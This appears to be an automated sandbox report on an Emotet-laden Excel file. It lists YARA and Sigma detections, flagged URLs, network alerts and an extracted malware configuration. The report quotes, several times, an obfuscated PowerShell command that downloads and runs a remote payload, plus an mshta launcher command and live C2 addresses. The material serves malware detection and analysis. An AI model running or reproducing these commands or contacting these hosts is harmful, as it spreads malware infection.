12.2.rundll32.exe.2730000.6.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
14.2.rundll32.exe.300000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
14.2.rundll32.exe.10000000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.180000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.2ed0000.13.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.27c0000.9.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.2e00000.12.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.3190000.14.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.2890000.10.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
9.2.rundll32.exe.1c0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
9.2.rundll32.exe.1c0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.2700000.5.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.2170000.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.2890000.11.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
11.2.rundll32.exe.10000000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
16.2.rundll32.exe.10000000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.10000000.14.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
9.2.rundll32.exe.10000000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.10000000.16.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.10000000.14.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.10000000.14.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 102 entries

Sigma Overview

System Summary

Sigma detected: Windows Shell File Write to Suspicious Folder

Source: File created

Author: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 2840, TargetFilename: C:\Users\user\AppData\Local

Sigma detected: MSHTA Spawning Windows Shell

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/qqw/aas/se.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2840, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 3012

Sigma detected: Suspicious MSHTA Process Patterns

Source: Process started

Author: Florian Roth: Data: Command: mshta http://91.240.118.168/qqw/aas/se.html, CommandLine: mshta http://91.240.118.168/qqw/aas/se.html, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: cmd /c mshta http://91.240.118.168/qqw/aas/se.html, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2824, ProcessCommandLine: mshta http://91.240.118.168/qqw/aas/se.html, ProcessId: 2840

Sigma detected: Microsoft Office Product Spawning Windows Shell

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: cmd /c mshta http://91.240.118.168/qqw/aas/se.html, CommandLine: cmd /c mshta http://91.240.118.168/qqw/aas/se.html, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2648, ProcessCommandLine: cmd /c mshta http://91.240.118.168/qqw/aas/se.html, ProcessId: 2824

Sigma detected: Suspicious PowerShell Command Line

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/qqw/aas/se.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2840, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 3012

Sigma detected: Mshta Spawning Windows Shell

Source: Process started

Author: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/qqw/aas/se.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2840, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 3012

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/qqw/aas/se.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2840, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 3012

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://kuyporn.com/wp-content/XS	Avira URL Cloud: Label: malware
Source: http://docs-construction.com/wp-admin/JJEf0kEA5/PE3	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlMuzL	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlWinSta0	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlfunction	Avira URL Cloud: Label: malware
Source: https://grupomartinsanchez.com/w	Avira URL Cloud: Label: malware
Source: https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/PE3	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlv1.0	Avira URL Cloud: Label: malware
Source: https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/PE3	Avira URL Cloud: Label: malware
Source: https://elroieyecentre.org/cgi-b	Avira URL Cloud: Label: malware
Source: https://thaireportchannel.com/wp-includes/KaWZp0odkEO/PE3	Avira URL Cloud: Label: malware
Source: http://jeffreylubin.igclout.com/wp-admin/vzOG/	Avira URL Cloud: Label: malware
Source: http://kuyporn.com/wp-content/XSs5/	Avira URL Cloud: Label: malware
Source: http://docs-construction.com/wp-admin/JJEf0kEA5/	Avira URL Cloud: Label: malware
Source: http://flybustravel.com/cgi-bin/2TjUH/	Avira URL Cloud: Label: malware
Source: http://wallacebradley.com/css/Yc	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlXtrP	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.pngPE3	Avira URL Cloud: Label: malware
Source: http://wallacebradley.com/css/YcDc927SJR/	Avira URL Cloud: Label: malware
Source: https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/PE3	Avira URL Cloud: Label: malware
Source: https://algzor.com/wp-includes/g	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlEtrM	Avira URL Cloud: Label: malware
Source: http://wallacebradley.com/css/YcDc927SJR/PE3	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlhttp://91.240.118.168/qqw/aas/se.html	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlA(	Avira URL Cloud: Label: malware
Source: https://bluwom-milano.com/wp-content/FEj3y4z/	Avira URL Cloud: Label: malware
Source: https://esaci-egypt.com/wp-includes/W7qXVeGp/	Avira URL Cloud: Label: malware
Source: https://thaireportchannel.com/wp-includes/KaWZp0odkEO/	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlO(	Avira URL Cloud: Label: malware
Source: http://kuyporn.com	Avira URL Cloud: Label: malware
Source: http://flybustravel.com/cgi-bin/2TjUH/PE3	Avira URL Cloud: Label: malware
Source: http://kuyporn.com/wp-content/XSs5/PE3	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.html	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlB	Avira URL Cloud: Label: malware
Source: https://bluwom-milano.com/wp-con	Avira URL Cloud: Label: malware
Source: https://bluwom-milano.com/wp-content/FEj3y4z/PE3	Avira URL Cloud: Label: malware
Source: http://jeffreylubin.igclout.com	Avira URL Cloud: Label: malware
Source: https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.png	Avira URL Cloud: Label: malware
Source: https://thaireportchannel.com/wp	Avira URL Cloud: Label: malware
Source: http://jeffreylubin.igclout.com/	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlC:	Avira URL Cloud: Label: malware
Source: http://flybustravel.com/cgi-bin/	Avira URL Cloud: Label: malware
Source: http://jeffreylubin.igclout.com/wp-admin/vzOG/PE3	Avira URL Cloud: Label: malware
Source: https://esaci-egypt.com/wp-inclu	Avira URL Cloud: Label: malware
Source: https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/	Avira URL Cloud: Label: malware
Source: http://91.240.118.168	URL Reputation: Label: malware
Source: https://algzor.com/wp-includes/ghFXVrGLEh/PE3	Avira URL Cloud: Label: malware
Source: https://algzor.com/wp-includes/ghFXVrGLEh/	Avira URL Cloud: Label: malware
Source: https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/qqw/aas/se.htmlmshta	Avira URL Cloud: Label: malware
Source: https://esaci-egypt.com/wp-includes/W7qXVeGp/PE3	Avira URL Cloud: Label: malware
Source: https://pcovestudio.com/wp-admin	Avira URL Cloud: Label: malware

Found malware configuration

Source: 10.2.rundll32.exe.2130000.4.raw.unpack

Malware Configuration Extractor: Emotet {"C2 list": ["74.207.230.120:8080", "139.196.72.155:8080", "37.44.244.177:8080", "37.59.209.141:8080", "116.124.128.206:8080", "217.182.143.207:443", "54.37.228.122:443", "203.153.216.46:443", "168.197.250.14:80", "207.148.81.119:8080", "195.154.146.35:443", "78.46.73.125:443", "191.252.103.16:80", "210.57.209.142:8080", "185.168.130.138:443", "142.4.219.173:8080", "118.98.72.86:443", "78.47.204.80:443", "159.69.237.188:443", "190.90.233.66:443", "104.131.62.48:8080", "62.171.178.147:8080", "185.148.168.15:8080", "54.38.242.185:443", "198.199.98.78:8080", "194.9.172.107:8080", "85.214.67.203:8080", "66.42.57.149:443", "185.148.168.220:8080", "103.41.204.169:8080", "128.199.192.135:8080", "195.77.239.39:8080", "59.148.253.194:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}

Multi AV Scanner detection for submitted file

Source: 80_513972285.xls

ReversingLabs: Detection: 33%

Multi AV Scanner detection for domain / URL

Source: kuyporn.com

Virustotal: Detection: 9%

Perma Link

Machine Learning detection for dropped file

Source: C:\ProgramData\QWER.dll

Joe Sandbox ML: detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\cmd.exe

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 91.240.118.168:80

Source: global traffic

DNS query: name: kuyporn.com

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 91.240.118.168:80

Networking

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic

Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49168 -> 91.240.118.168:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 74.207.230.120:8080
Source: Malware configuration extractor	IPs: 139.196.72.155:8080
Source: Malware configuration extractor	IPs: 37.44.244.177:8080
Source: Malware configuration extractor	IPs: 37.59.209.141:8080
Source: Malware configuration extractor	IPs: 116.124.128.206:8080
Source: Malware configuration extractor	IPs: 217.182.143.207:443
Source: Malware configuration extractor	IPs: 54.37.228.122:443
Source: Malware configuration extractor	IPs: 203.153.216.46:443
Source: Malware configuration extractor	IPs: 168.197.250.14:80
Source: Malware configuration extractor	IPs: 207.148.81.119:8080
Source: Malware configuration extractor	IPs: 195.154.146.35:443
Source: Malware configuration extractor	IPs: 78.46.73.125:443
Source: Malware configuration extractor	IPs: 191.252.103.16:80
Source: Malware configuration extractor	IPs: 210.57.209.142:8080
Source: Malware configuration extractor	IPs: 185.168.130.138:443
Source: Malware configuration extractor	IPs: 142.4.219.173:8080
Source: Malware configuration extractor	IPs: 118.98.72.86:443
Source: Malware configuration extractor	IPs: 78.47.204.80:443
Source: Malware configuration extractor	IPs: 159.69.237.188:443
Source: Malware configuration extractor	IPs: 190.90.233.66:443
Source: Malware configuration extractor	IPs: 104.131.62.48:8080
Source: Malware configuration extractor	IPs: 62.171.178.147:8080
Source: Malware configuration extractor	IPs: 185.148.168.15:8080
Source: Malware configuration extractor	IPs: 54.38.242.185:443
Source: Malware configuration extractor	IPs: 198.199.98.78:8080
Source: Malware configuration extractor	IPs: 194.9.172.107:8080
Source: Malware configuration extractor	IPs: 85.214.67.203:8080
Source: Malware configuration extractor	IPs: 66.42.57.149:443
Source: Malware configuration extractor	IPs: 185.148.168.220:8080
Source: Malware configuration extractor	IPs: 103.41.204.169:8080
Source: Malware configuration extractor	IPs: 128.199.192.135:8080
Source: Malware configuration extractor	IPs: 195.77.239.39:8080
